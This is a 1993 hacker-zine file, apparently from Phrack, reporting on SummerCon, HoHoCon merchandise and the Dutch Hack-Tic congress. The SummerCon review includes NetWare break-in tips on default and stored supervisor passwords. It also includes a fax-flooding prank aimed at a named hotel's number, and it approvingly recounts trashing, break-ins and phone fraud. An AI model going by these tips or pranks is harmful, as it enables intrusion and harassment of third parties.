Drunkfux started by, Merchandising a shitload of ho-ho con shirts, 15$ a piece as well as mthreat his tonloc shirts, also selling the mods for the Mitsubishi 800, mthreat also had a chip preprogrammed for the Mits 800 avail. Those who could not get the mod were told to get it from cypher.com in /pub/vind. He told us of the new Metal Land revival and said a bit about it. Next and most interesting was the discussion of the fate of Louis Cypher, and his companions in the recent bust.
It seems Cypher and ALLEGED accomplices Doc and JP have been charged with numerous felonies not the least of which is Treasury Fraud and b&e of a federal post office. Drunkfux went into detail on how they had been turned on, and essentially entrapped into the situation. Also how the media as per usual had made a witch hunt out of it by connecting Doc to a remote relation to the Kennedys etc, etc.

Eric Nielson with CPSR

Eric Nielson started by telling the crowd what had drawn him to the CPSR, by the way of reading a discussion in congress about a congressman defending the strength of a Starwars network by stating that the gov had an excellent example for security: the phone networks in the USA. Needless to say Eric had little faith in this analogy. He went on to describe what the CPSR covers and what they have done recently in the of the clipper debate, Sundevil and other 1st Amend. issues. He discussed the internal workings of CPSR and its funding policy as well as telling Conf Members how to go about joining.

Erik Bloodaxe

Erik started out with explaining why Phrack 43 is not yet out. This is due to the fact that Stormking.com will not allow it to be mailed from it, seeing as the owner does telco consulting and feels it would be a conflict of interest. Furthermore he won't give the listserve to the Phrack Staff, making it somewhat difficult to distribute. However KL is acting as a mediator and hopefully this will be settled soon. Mindvox was considered but rejected as a choice, for fear of people getting a hold of the list.

On the issue of Phrack and the copyright, Erik had only ONE fed register out of all those who collect it. However Phrack has obtained logs of both CERT forwarding Phrack by mail, as well as Tymnet obtaining the mag.
Beyond this Agent Steel was discussed in an "I told you so fashion" it turns out that him being accused of being a narc in the past were valid, seeing it was proved by way of documentation that Agent ratted out Kevin Poulsen (Dark Dante) resulting in his current 19 charges.

And of Course the new LOD issue was broached, however very little was discussed on it and it was simply agreed to a large degree that Cameron (lord Havoc) must have been seriously abused as a child to display the type of obvious brain damage he is afflicted with now.

Emmanuel Goldstein 2600

Emmanuel Goldstein in his purple Bellcore shirt discussed with us his appearance before a Congressional hearing on a panel with Don Delaney and how the hostility shown towards him by the house representatives in session. Beyond this he went on to describe several nasty letters sent to him by telcos for PUBLIC info he had posted in the winter issue of 2600. This is a very brief summary of what he had to say, mainly due to the fact that I was too busy listening to him to concentrate my apologies go to those who were interested in reading the whole thing.

Next up was a lengthy discussion on Novell Software and its weaknesses, By Erreth Akbe however the speaker he wished me to leave this out of the transcripts so I will respect his wishes in this.

********End Of Transcript***********

I would like to thank the following for making the Con an experience for me that I will not soon forget: Arist0tle, Black Kat, Butler, Control-C, Erreth Akbe, Tommydcat, the Public and theNot. Thx guys.

Please send all responses to Besaville@acdm.sait.ab.ca

*****************************************************************************

Presenting ::: SummerCon 1993 in Review !!!

Hacking Tales and Exploits by the SotMESC
Additional Activities by the GCMS MechWarriors

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

The weather was right, too right. Something was foul in the air.
It was akin to that mythical 'Calm before the Storm' scenario that is dreaded by so many. But, Scribbles and I boarded the Techno-Laden SotMESC compact and took off down the Highway to our ultimate goal . . . Hacker Heaven in Summertime Fun - SummerCon !!! Instantly, weather was seen brewing in the Caribbean. Hints of Hurricanes echoed through the towns we drifted through. To alleviate any anxieties, massive quantities of Jolt! were obtained in the infamous town of Hatties-Gulch, a small town taken over by the virulent filth called College Students. The trip continued, over hill and over dale. Dale was quite considerate not to press charges. Colleges were passed in a blink of the eye. Nothing was going to stop us. We were on a mission from the Church. But, that's another story. After locating that famous arch, a beeline was made at speeds over 100 MPH through St. Louis until our destination came into view: The St. Louis Executive International (800-325-4850). We came to meet our nemesis and friends at the fest hosted by the Missouri Programming Institute. Brakes were quickly applied as the car appeared to be going off the off-ramp and into the ditch. From the lobby it was obvious, there were unusual people here. These were the kind of people that you fear your daughters would never meet. The kind of people that kicked themselves into caffeine frenzies and would become infatuated with virtual lands. Yes, these were my kind of people. Now, the adventure may start . . . Oh, and in response to A-Gal on pg 30 of 2600, Scribbles says she's the sexiest hacker on the nets. Hmmmmm, I'm inclined to agree with that. I'm sure Control-C will agree too, especially after he trailed her for half of SCon. Now, we all know that Friday is the warm-up day on what we can expect to see at SCon during the main Saturday drag. It was no surprise to find the main junction box rewired, pay-phones providing free services, rooms rerouted and computers running rampant down the hallways. 
But, the traditional trashing of Control-C's room this early signaled that more would be needed to top the night. The maid was definitely not pleased.

For a list of those that attended, maybe KL can provide us with that information. There were too many faces for my fingers to lap into. And, there were quite a few new faces. I believe that Weevil was the youngest hacker at 16, and Emmanuel was the oldest, although he didn't give his age.

-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
THE CONFERENCE
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-

Let's get to the meat of the matter. The conference had a nice spacious central area with tables neatly lining alongside the wall. Between the tables and the walls were many hacks packed as tightly as they could get. Why didn't we think of moving the tables closer together ???

KL took control and ran the conference smoothly. dFx panned everyone on his digital camcorder. Several cameras were around to provide us with gifs later. And the conference took off . . .

First up was Stuart from SRI (Stanford Research Institute). He elaborated on SRI's being involved in research, engineering and design. From studies done around the world with hackers and those associated, malicious hacking can not be stopped. There is no evidence, though, that the current hackers are interested in bringing the networks down at all. Concern was given to new hackers that may be emerging with financial gain and maliciousness occurring. The top security hole with system was noted as being the infamous social engineering technique. SRI did note that many places did not utilize the security that they even had in place. It was also noted that laws against malicious hackers, and probably any hacker, should be fair and just.
The most malicious hacks that are turning up have been spotted in the following named countries: Holland, Scandinavia countries, very possibly soon in the UK, Australia, Israel, the former USSR, and Bulgaria ( noted for virii writers ). A voice made mention of Operation Rahab, hackers in German Intelligence.

Next up was Count Zero from cDc/RDT to talk about packet radio. His talk included information about the IESS and handed out a flyer on America 2000 ( school under 1984 regimes ). Maybe someone will provide us with a copy of this. A packet radio modem at 1200 can be obtained easily for $50. TCP/IP packets are already being sent over the bandwidth along with other network protocols. The usefulness of all this is that the information is broadcast and it is virgin territory. The baud limitation is due only based upon the bandwidth you are operating at and the number of collisions occurring. On a band you can see every packet that is being transmitted if you wish. All this is located on a 2 meter band. Currently the FCC forbids encryptions on the airwaves, although this is noted as being virtually impossible to enforce. It also takes 5 months to get an amateur radio license, and your personal info is recorded in a book easily obtained at libraries. The problem with going around the FCC is that there exist vigilante HAMs that monitor the bands and have nothing better to do than filter info and whine to the FCC. Bandwidths are decreasing though. This is due to an increased interest overall by communications in these areas. Unless you do something major the FCC will not give you much interest. The book on preparing yourself for a Tech Class can be obtained from Radio Shack for $9.

Next up was dFx. He was promoting the HCon and Tone-Loc t-shirts that were for sale. Merchandising was getting pretty high. He also gave out a few Mitsubishi 800 disks.
He was also recognized as the ONLY and LAST member of the Neon Knights, a club that had a wide range of comedy names generated. The word was put out that HCon '93 will be in December 17-19 with a hint that it could also wind up being in Austin. Then the conversation turned to Lord Byron's bust, which we should hear more information on any day this week. The conversation reiterated the government narc that was at the AA meeting that was pressuring Byron. Byron was also noted as having rejected a plea bargain the courts offered him. And lastly, it is going to happen soon so get them while you can. The FTP site at eff.org will be dropping its CuD directory due to a conflict of interest with EFF's major contributors, mainly the RBOCs and other interest groups that don't like us.

Erik Bloodaxe took the table next to talk about what was happening with his involvement with Phrack and some interesting info about Agent Steel. As for Phrack, the Email list is being withheld by Tuc. The mailing list has been refused at Mindvox due to files missing mysteriously at that site. And, no organization registered for Phrack #42 since it was copyrighted with a nice and lengthy preamble, except for one company from Mitre. Currently Phrack #43 is in limbo and is estimated at 1 Meg long. Going onto the info about Agent Steel, basically he's a narc. Lord Havoc from Canada is trying to restart the LOD under some unknown logical rationale that since LOD is defunct, anyone can reclaim the name. Lord Havoc, aka Cameron, has been going around trying to get documentation to put together an LOD technical journal #5. Supposedly there is a skin-head group in Canada that is now tracking Cameron down.

Someone came up next [Minor Threat] and gave us an update on Codec. Two weeks after the last SCon, Codec was pulled over while on the run from the law for speeding and then arrested for burglary, resisting arrest, etc . . .
He is estimated to be out of jail in 1995 and still has time to serve in a few other states. Mail can be sent to him at this address: codec@cypher.com. Maybe Crunch can give Codec some hints on how to get by in prison?

From the CPSR, Eric Nielson took the table. He elaborated on the CPSR and ran a Q&A period. Basically, the CPSR files many FOIA requests and sues the government. Their focus is on the workplace computing. Elaboration was given on the Clipper Chip and computer ship security. The CPSR is staffed with lawyers and takes their funding from dues and grants. They are not sponsored by any corporations.

From the far side of the table came the infamous Emmanuel Goldstein from 2600. He stated how he had testified at congress and gave them a live demonstration of bandwidth scanning and redboxing. While he was there, the inquisition started against him on the issue of 2600. Emmanuel then tried to explain the culture to our representative that it is bad to classify all hackers as criminals. Goldstein then went on to talk about the DC 2600 bust and how it has resulted in 2600 meetings springing up all across the country. A review of several films on software piracy at the office, disaster recovery and viruses from Commonwealth Films was given. And, to highlight everything, 2600 has purchased an AT&T van that they plan to take to assorted conventions and start a fleet of these up.

Pst, BTW, on pg 43 of 2600 the intersection should be a jump =:)

Last up was Erreth Akby, a Certified Netware Engineer. He explained that the only upgrade in Novell 4.0 is the disk compression. He also informed us that the supervisor and guest accounts generally have default passwords. To hack into this Net, you should use a PC with full alt and function keys. The supervisor p/w is on the RConsole in a file called autoexec.mcf on version 3.11. Netcrack will not work on a system with Intruder Lock-Out. Non-dedicated netware must boot from a floppy.
Best of all, you can dial out by using cubix-quarts, which are PC with modems on the system.

Below is a quick reprint of a paper that was recovered from Control-C's trashed room.

Mrs Jasnagan,

I would like to set up a meeting to discuss Kevin's progress in Social Studies and English. Please let me know when it would be convenient.

Thank you ( Scribble , scribble )

Dear Mr + Mrs Gormby,

We would be happy to meet with you at 9:30 on Thursday, April 1st in Room 104

Sincerely, M.Jarnagin & S.Dietrich

Now, could this be Kevin Poulsen ??? Naaa, no way. Amazing what technical data trashing will uncover. I guess I should throw this away now . . .

After the convention, there was much rejoicing. The reasons would become fairly obvious as a 'swingers party' sign was soon located outside one of the hotel wings. Yes, it would be a very good convention.

Several people made their way to the vehicles for a long night of trashing and raiding of the various FedEx, UPS and other assorted boxes around town. Other groups made their way to computers that were trying to connect with anything they could out in town. There were also those that reluctantly went to the mall to take advantage of the local population.

What did not happen ??? Control-C did not get laid, but it was rumored that there were a few 12-year olds wandering around the hotel looking for this legendary hacker. No deaths had occurred, the fires were kept to a minimum and nothing major was noted as being broken.

One thing was for sure, there were a lot of alcoholic beverages going around, walkie-talkies, scanners, and wild tales. Several area buildings were broken into, but nothing major was done.

Then the shit hit the fan. It seems several hackers had riled the swingers into a frenzy. I guess the swingers couldn't swing with it. What happened ??? Phones went ringing room to room and radios blared to life that the cops were here !!!
At count, there were 6 cops, 1 sheriff and 4 hotel employees that started patrolling the hallways. Yes, we were under room arrest at our own convention in our own wing. Anyone that left their room was told to stay there or they would be arrested. The cops were very insistent that no pictures were to be taken. The swingers had broken our balls.

But, this would not stop us. Soon, there was a phone network going on with radio interfaces. The windows opened and a few migrated to other locations of the hotel. After a while, the authorities left feeling satisfied that they had intimidated us. They didn't. After they left, the hallways erupted again.

In the SotMESC room a gathering turned out to watch several techno-infested videos. At the cDc room were others viewing the HoHoCon '92 film that dFx brought down with him. At one point, the microwave around the lobby was detonated and a mysterious stack of Credit Card carbons was found. The liberated phones were being utilized to their full international extent, and several of the soda machines decided to give out a few free drinks.

But, we couldn't leave well enough alone. Sir Lance went to the lobby and took a picture of the hotel Asst. Manager. I guess this guy didn't like his photo being taken, since he turned around and called the cops on Sir Lance. Down the hallway the cops came, dragging Sir Lance back with them. In the end, the cops explained to the Asst. Manager that it was not a crime in the US to take pictures of people.

In another related story, Kaos Wizard wound up calling the SotMESC room with a wild plea for help. It seemed he was with a large group of trashers that included Albatross, Intrepid, Forced Entry, Zippy, The Public and more. Kaos was at a Central Office close to the hotel on Woodson and needed help. He had taken off to take a piss and noticed that the trashers were surrounded by cops when he returned.
There was no way he was going back with all those cops there ( and, might I mention, there was also a police dog ). Mystic Moos gathered up a few people and went to rescue Kaos Wizard as the rest of the trashers returned to the hotel. It seems they had eluded the cops by telling them that they were waiting for their friend to return from taking a bathroom break ( Kaos Wizard ). Unfortunately, he never returned. The cops let them go eventually. Mystic Moos rescued Kaos Wizard, and the hotel was aglow in activity again. Control-C came down the hall at one point to make a startling discovery. It seems that at a local club there was a band playing that featured 'Lex Luthor'. The elusive X-LOD founder had been located. After some thought, it was decided he could stay there and sing the blues while the rest of us partied the night away. For those interested, the hotel fax is 314-731-3752. One of the police officers detaining us was S.M. Gibbons. IBM will send a 36 page fax to the number you give them. To activate, call 1-800-IBM-4FAX. As you can imagine, it wasn't long before the hotel's fax ran out of thermal paper. Below is a gathering of Flyers . . . HoHoCon '92 Product Ordering Information If you are interested in obtaining either HoHoCon shirts or videos, please contact us at any of the following: drunkfux@cypher.com hohocon@cypher.com cDc@cypher.com dfx@nuchat.sccsu.com 359@7354 (WWIV Net) HoHoCon 1310 Tulane, Box #2 Houston, Tx 77008-4106 713-468-5802 (data) The shirts are $15 plus $3 shipping ($4 for two shirts). At this time, they only come in extra large. We may add additional sizes if there is a demand for them.
The front of the shirt has the following in a white strip across the chest:

    I LOVE FEDS

( Where LOVE = a red heart, very similar to the I LOVE NY logo )

And this on the back:

    dFx & cDc Present
    HoHoCon '92
    December 18-20
    Allen Park Inn
    Houston, Texas

There is another version of the shirt available with the following:

    I LOVE WAREZ

The video includes footage from all three days, is six hours long and costs $18 plus $3 shipping ($4 if purchasing another item also). Please note that if you are purchasing multiple items, you only need to pay one shipping charge of $4, not a charge for each item.

If you wish to send an order in now, make all checks or money orders payable to O.I.S., include your phone number and mail it to the street address listed above. Allow a few weeks for arrival.

Thanks to everyone who attended and supported HoHoCon '92. Mail us if you wish to be an early addition to the HoHoCon '93 (December 17-19) mailing list.

Calvary Black Crawling Systems 617-267-2732 617-482-6356 ATDT EAST 617-350-STIF

DemOnseed sez: "Call ATDT East or I'll crush your skull"

Home of -= RDT... Trailings to follow . . .

Slug, slug, slugfest . . . Join the ranks of the Cons: HoHoCon, MardiCon, SummerCon !!!

****************************************************************************

Top 25 Things I Learned at SummerCon '93
--------------------------------
By Darkangel

SummerCon is a place where many hackers from all over the world meet to discuss the current state of hacking today, and to drink themselves under the table. Every year, pages and pages of useful information is passed and traded among the participants. In this brief summary, I will attempt to point out the things that I learned and I thought were the most helpful to the whole hacker community. I hope you enjoy it.

#1) DON'T let Control-C within 15 feet of any person that does not have a penis.
#2) Knight Lightning will have a stroke before the age of 30.
#3) French Canadians ALWAYS sound drunk.
#4) Loops do not make good pickup lines.
#5) The Zenith is outside the window. Just look up.
#6) Smoking certain herbs is still illegal in St. Louis.
#7) If you see a taxi and think it might be a cop, it probably is.
#8) Hotel Security is worse than Mall Security.
#9) The payphones in the lobby are not meant to be free.
#10) Do not climb through the ceiling to get to the room with the PBX in it.
#11) Do not glue the locks shut on an entire floor of the hotel. (especially when people are in them)
#12) This machine is broken.
#13) Do not dump bags you got trashing on the floor of someone else's room.
#14) St. Louis police do not appreciate the finer points of Simplex lock hacking.
#15) VaxBuster should never be allowed to drink Everclear.
#16) Scribbles has a very nice ass.
#17) Do not photograph Pakistani hotel security guards.
#18) Do not try to bring a six pack through customs.
#19) Loki is the Fakemail God.
#20) Do not rip the phone boxes out of the walls and cut the wires.
#21) Barbie Doll pornos can be cool.
#22) Frosty can do weird things with techno and movies.
#23) Always remove the mirrors from the walls to check for hidden cameras.
#24) Do not threaten or harass other people staying at the same hotel. This can be bad.
#25) I really don't think the hotel will let us come back.

That wraps it up! See you at HoHoCon!

-Darkangel

***************************************************************************

Hack-Tic Presents

H A C K I N G at the E N D of the U N I V E R S E

1993 SUMMER CONGRESS, THE NETHERLANDS

=========================================================================

HEU?

Remember the Galactic Hacker Party back in 1989? Ever wondered what happened to the people behind it? We sold out to big business, you think. Think again, we're back! That's right.
On August 4th, 5th and 6th 1993, we're organizing a three-day summer congress for hackers, phone phreaks, programmers, computer haters, data travellers, electro-wizards, networkers, hardware freaks, techno-anarchists, communications junkies, cyberpunks, system managers, stupid users, paranoid androids, Unix gurus, whizz kids, warez dudes, law enforcement officers (appropriate undercover dress required), guerilla heating engineers and other assorted bald, long-haired and/or unshaven scum. And all this in the middle of nowhere (well, the middle of Holland, actually, but that's the same thing) at the Larserbos campground four meters below sea level. The three days will be filled with lectures, discussions and workshops on hacking, phreaking, people's networks, Unix security risks, virtual reality, semafun, social engineering, magstrips, lockpicking, viruses, paranoia, legal sanctions against hacking in Holland and elsewhere and much, much more. English will be the lingua franca for this event, although one or two workshops may take place in Dutch. There will be an Internet connection, an intertent ethernet and social interaction (both electronic and live). Included in the price are four nights in your own tent. Also included are inspiration, transpiration, a shortage of showers (but a lake to swim in), good weather (guaranteed by god), campfires and plenty of wide open space and fresh air. All of this for only 100 dutch guilders (currently around US$70). We will also arrange for the availability of food, drink and smokes of assorted types, but this is not included in the price. Our bar will be open 24 hours a day, as well as a guarded depository for valuables (like laptops, cameras etc.). You may even get your stuff back! For people with no tent or air mattress: you can buy a tent through us for 100 guilders, a mattress costs 10 guilders. You can arrive from 17:00 (that's five p.m. for analogue types) on August 3rd.
We don't have to vacate the premises until 12:00 noon on Saturday, August 7 so you can even try to sleep through the devastating Party at the End of Time (PET) on the closing night (live music provided). We will arrange for shuttle buses to and from train stations in the vicinity. HOW? Payment: in advance please. Un-organized, poor techno-freaks like us would like to get to the Bahamas at least once. We can only guarantee you a place if you pay before Friday June 25th, 1993. If you live in Holland, just transfer fl. 100 to giro 6065765 (Hack-Tic) and mention 'HEU' and your name. If you're in Germany, pay DM 100,- to Hack-Tic, Konto 2136638, Sparkasse Bielefeld, BLZ 48050161. If you live elsewhere: call, fax or e-mail us for the best way to get the money to us from your country. We accept American Express, we do NOT cash ANY foreign cheques. HA! Very Important: Bring many guitars and laptops. ME? Yes, you! Busloads of alternative techno-freaks from all over the planet will descend on this event. You wouldn't want to miss that, now, would you? Maybe you are part of that select group that has something special to offer! Participating in 'Hacking at the End of the Universe' is exciting, but organizing your very own part of it is even more fun. We already have a load of interesting workshops and lectures scheduled, but we're always on the lookout for more. We're also still in the market for people who want to help us organize during the congress. In whatever way you wish to participate, call, write, e-mail or fax us soon, and make sure your money gets here on time. Space is limited. SO: - 4th, 5th and 6th of August - Hacking at the End of the Universe (a hacker summer congress) - ANWB groepsterrein Larserbos Zeebiesweg 47 8219 PT Lelystad The Netherlands - Cost: fl. 
100,- (+/- 70 US$) per person (including 4 nights in your own tent)

MORE INFO:

Hack-Tic
Postbus 22953
1100 DL Amsterdam
The Netherlands

tel : +31 20 6001480
fax : +31 20 6900968
E-mail : heu@hacktic.nl

VIRUS: If you know a forum or network that you feel this message belongs on, by all means slip it in. Echo-areas, your favorite bbs, /etc/motd, IRC, WP.BAT, you name it. Spread the worm, uh, word.

=========================================================================

SCHEDULE

day 0 August 3rd, 1993
=====
16:00 You are welcome to set up your tent
19:00 Improvised Dinner

day 1 August 4th, 1993
=====
11:00-12:00 Opening ceremony
12:00-13:30 Workshops
14:00-15:30 Workshops
15:30-19:00 'Networking for the Masses'
16:00-18:00 Workshops
19:00-21:00 Dinner
21:30-23:00 Workshops

day 2 August 5th, 1993
=====
11:30-13:00 Workshops
14:00-17:00 Phreaking the Phone
14:00-17:00 Workshops
17:30-19:00 Workshops
19:00-21:00 Dinner

day 3 August 6th, 1993
=====
11:30-13:00 Workshops
14:00-18:00 Hacking (and) The Law
14:00-17:00 Workshops
18:00-19:00 Closing ceremony
19:00-21:00 Barbeque
21:00-??:?? Party at the End of Time (Live Music)

day 4 August 7th, 1993
=====
12:00 All good things come to an end

=========================================================================

'Networking for the masses', Wednesday August 4th 1993, 15:30

One of the main discussions at the 1989 Galactic Hacker Party focused on whether or not the alternative community should use computer networking. Many people felt a resentment against using a 'tool of oppression' for their own purposes. Computer technology was, in the eyes of many, something to be smashed rather than used.

Times have changed. Many who were violently opposed to using computers in 1989 have since discovered word-processing and desktop publishing. Even the most radical groups have replaced typewriters with PCs. The 'computer networking revolution' has begun to affect the alternative community.
Not all is well: many obstacles stand in the way of the 'free flow of information.' Groups with access to information pay such high prices for it that they are forced to sell information they'd prefer to pass on for free. Some low-cost alternative networks have completely lost their democratic structure. Is this the era of the digital dictator, or are we moving towards digital democracy? To discuss these and other issues, we've invited the following people who are active in the field of computer networking: [Electronic mail addresses for each of the participants are shown in brackets.] Ted Lindgreen (ted@nluug.nl) is managing director of nlnet. Nlnet is the largest commercial TCP/IP and UUCP network provider in the Netherlands. Peter van der Pouw Kraan (peter@hacktic.nl) was actively involved in the squat-movement newsletters 'Bluf!' and 'NN' and has outspoken ideas about technology and its relation to society. Had a PC all the way back in 1985! Maja van der Velden (maja@agenda.hacktic.nl) is from the Agenda Foundation which sets up and supports communication and information projects. Joost Flint (joost@aps.hacktic.nl) is from the Activist Press Service. APS has a bbs and works to get alternative-media and pressure groups online. Felipe Rodriquez (nonsenso@utopia.hacktic.nl) is from the Hack-Tic Network which grew out of the Dutch computer underground and currently connects thousands of people to the global Internet. Andre Blum (zabkar@roana.hacktic.nl), is an expert in the field of wireless communications. Eelco de Graaff (Eelco.de.Graaff@p5.f1.n281.z2.fidonet.org) is the nethost of net 281 of FidoNet, EchoMail troubleshooter, and one of the founders of the Dutch Fidonet Foundation. Michael Polman (michael@antenna.nl) of the Antenna foundation is a consultant in the field of international networking. He specialises in non-governmental networks in the South. 
Alfred Heitink (alfred@antenna.nl) is a social scientist specializing in the field of computer-mediated communication as well as system manager at the Dutch Antenna host. Rena Tangens (rena@bionic.zer.de), was involved in the creation of the Bionic Mailbox in Bielefeld (Germany) and the Zerberus mailbox network. She is an artist and wants to combine art and technology. The discussion will be led by freelance radiomaker and science journalist Herbert Blankesteyn. He was involved in the 'Archie' children's bbs of the Dutch VPRO broadcasting corporation. ========================================================================= 'Phreaking the Phone', Thursday August 5th 1993, 14:00 Your own telephone may have possibilities you never dreamed possible. Many years ago people discovered that one could fool the telephone network into thinking you were part of the network and not just a customer. As a result, one could make strange and sometimes free phonecalls to anywhere on the planet. A subculture quickly formed. The phone companies got wise and made a lot of things (nearly) impossible. What is still possible today? What is still legal today? What can they do about it? What are they doing about it? Billsf (bill@tech.hacktic.nl) and M. Tillman, a few of the world's best phreaks, will introduce the audience to this new world. Phone phreaks from many different countries will exchange stories of success and defeat. Your life may never be the same. ========================================================================= 'Hacking (and) The Law', Friday August 6th, 14:00 You can use your own computer and modem to access some big computer system at a university without the people owning that computer knowing about it. For years this activity was more or less legal in Holland: if you were just looking around on the Internet and didn't break anything nobody really cared too much... That is, until shortly before the new computer crime law went into effect.
Suddenly computer hackers were portrayed as evil 'crashers' intent on destroying systems or, at least, looking into everyone's files. The supporters of the new law said that it was about time something was done about it. Critics of the law say it's like hunting mosquitoes with a machine-gun. They claim the aforementioned type of hacking is not the real problem and that the law is excessively harsh. To discuss these issues we've invited a panel of experts, some of whom are, or have been, in touch with the law in one way or another. Harry Onderwater (fridge@cri.hacktic.nl), is technical EDP auditor at the Dutch National Criminal Intelligence Service (CRI) and is responsible for combatting computer crime in the Netherlands. He says he's willing to arrest hackers if that is what it takes to make computer systems secure. Prof. Dr. I.S. (Bob) Herschberg (herschbe@dutiws.twi.tudelft.nl), gained a hacker's control over his first system 21 years ago and never ceased the good work. Now lecturing, teaching and publishing on computer insecurity and imprivacy at the technical university in Delft. His thesis: 'penetrating a system is not perpetrating a crime'. Ronald 'RGB' O. (rgb@utopia.hacktic.nl) has the distinction of being the only Dutch hacker arrested before and after the new law went into effect. He is a self-taught UNIX security expert and a writer for Hack-Tic Magazine. Ruud Wiggers (ruudw@cs.vu.nl), system manager at the Free University (VU) in Amsterdam, has for 10 years been trying to plug holes in system security. He was involved in the RGB arrest. Andy Mueller-Maguhn (andy@cccbln.ccc.de) is from the Chaos Computer Club in Germany. Eric Corley (emmanuel@eff.org) a.k.a. Emmanuel Goldstein is editor of the hacker publication '2600 magazine'. The first person to realize the huge implications of the government crackdown on hackers in the US. 
Winn Schwartau (wschwartau@mcimail.com) is a commercial computer security advisor as well as the author of the book 'Terminal Compromise'. His new book entitled 'Information Warfare' has just been released. Ray Kaplan (kaplan@bpa.arizona.edu) is a computer security consultant. He is constantly trying to bridge the gap between hackers and the computer industry. He organizes 'meet the enemy' sessions where system managers can teleconference with hackers. Wietse Venema (wietse@wzv.win.tue.nl) is a systems expert at the Technical University in Eindhoven. He is the author of some very well known utilities to monitor hacking on unix systems. He has a healthy suspicion of anything technical. Peter Klerks (klerks@rulfsw.leidenuniv.nl) is a scientist at the centre for the study of social antagonism at the Leiden University. He has studied the Dutch police force extensively, and is author of the book 'Counterterrorism in the Netherlands.' Don Stikvoort (stikvoort@surfnet.nl), one of the computer security experts for the Dutch Academic Society and chairman of CERT-NL (Computer Emergency Response Team). He is also actively involved in SURFnet network management. Rop Gonggrijp (rop@hacktic.nl) was involved in some of the first computer break-ins in the Netherlands during the 80's and is now editor of Hack-Tic Magazine. The discussion will be led by Francisco van Jole (fvjole@hacktic.nl), journalist for 'De Volkskrant'. ========================================================================= WORKSHOPS HEUnet introduction an introduction to the Hacking at the End of the Universe network. Jumpstart to VR, 3D world-building on PC's Marc Bennett, editor of Black Ice magazine, will explain how to design worlds on your own PC which can be used in Virtual Reality systems. 
Replacing MS/DOS, Running UNIX on your own PC People who are already running unix on their PCs will tell you what unix has to offer and they'll talk about the different flavours in cheap or free unix software available. Unix security RGB and fidelio have probably created more jobs in the unix security business than the rest of the world put together. They'll talk about some of the ins and outs of unix security. E-mail networking Should we destroy X400 or shall we let it destroy itself? 'User Authorization Failure' A quick introduction to the VAX/VMS Operating System for those that consider a career in VMS security. 'The right to keep a secret' Encryption offers you the chance to really keep a secret, and governments know it. They want you to use locks that they have the key to. The fight is on! 'Virus about to destroy the earth!'. Don't believe the hype! What is the real threat of computer viruses? What technical possibilities are there? Are we being tricked by a fear-machine that runs on the money spent on anti-virus software? 'It came out of the sky' 'Receiving pager information and what not to do with it'. Information to pagers is sent through the air without encryption. Rop Gonggrijp and Bill Squire demonstrate a receiver that picks it all up and present some spooky scenarios describing what one could do with all that information. Cellular phones and cordless phones How do these systems work, what frequencies do they use, and what are the differences between different systems world-wide? Zen and the art of lock-picking. In this workshop The Key will let you play with cylinder locks of all types and tell you of ingenious ways to open them. "Doesn't mean they're not after you" The secret services and other paranoia. Audio Adventures Steffen Wernery and Tim Pritlove talk about adventure games that you play using a Touch Tone telephone. Botanical Hacking (THC++) Using computers, modems and other high tech to grow. 
Wireless LAN (Data Radio) How high a data rate can you pump through the air, and what is still legal? Social Engineering The Dude, well known from his articles in Hack-Tic, will teach you the basics of social engineering, the skill of manipulating people within bureaucracies. 'Hacking Plastic' Tim and Billsf talk about the security risks in chip-cards, magnetic cards, credit cards and the like. Antenna Host Demo The Antenna Foundation is setting up and supporting computer networks, mainly in the South. They are operating a host system in Nijmegen, The Netherlands, and they will demonstrate it in this workshop, and talk about their activities. APS Demo APS (Activist Press Service) is operating a bbs in Amsterdam, The Netherlands. You'll see it and will be able to play with it 'hands-on'. 'Hocking the arts' Benten and Marc Marc are computer artists. They present some of their work under the motto: Hocking the arts, demystifying without losing its magic contents. Public Unix Demo Demonstrating the Hack-Tic xs4all public unix, as well as other public unix systems. Packet Radio Demo Showing the possibilities of existing radio amateur packet radio equipment to transport packets of data over the airwaves. ========================================================================= COMPUTERS AT 'HACKING AT THE END OF THE UNIVERSE' This will get a little technical for those who want to know what we're going to set up. If you don't know much about computers, just bring whatever you have and we'll see how and if we can hook it up. We're going to have ethernet connected to Internet (TCP/IP). You can connect by sitting down at one of our PC's or terminals, by hooking up your own equipment (we have a depository, so don't worry about theft), or by using one of our 'printerport <--> ethernet' adapters and hooking up laptops and notebooks that way. There may be a small fee involved here, we don't know what they're going to cost us. 
Contact us for details, also if you have a few of these adapters lying around. There might also be serial ports you can connect to using a nullmodem cable. You can log in to our UNIX system(s) and send and receive mail and UseNet news that way. Every participant that wants one can get her/his own IP number to use worldwide. Users of the network are urged to make whatever files they have on their systems available to others over the ethernet. Bring anything that has a power cord or batteries and let's network it! ========================================================================= -- Hstorm ++31 2230 60551 Ad Timmering  ==Phrack Magazine== Volume Four, Issue Forty-Three, File 8 of 27 CONFERENCE NEWS PART II **************************************************************************** Fear & Loathing in San Francisco By Some Guy (The names have been changed to protect the guilty.) 1. The Arrival I had been up for about 48 hours by the time America West dropped me off at San Francisco's airport. The only thing I could think about was sleep. Everything took on strange dreamlike properties as I staggered through the airport looking for the baggage claim area. Somehow, I found myself on an airport shuttle headed towards the Burlingame Marriott. Suddenly I was standing in front of an Iranian in a red suit asking me for a major credit card. After a quick shuffle of forms at the checkin counter I finally had the cardkey to my room and was staggering toward a nice warm bed. Once in the room I fell down on the bed, exhausted. Within the space of a few minutes I was well on my way to Dreamland. Within the space of a few more minutes I was slammed back into reality as someone came barreling into the room. Mr. Blast had arrived from Chitown with a bag full of corporate goodies. I accepted a shirt and told him to get lost. No sooner had he left than Fitzgerald burst in with enough manuals to stock a small college's technical library. 
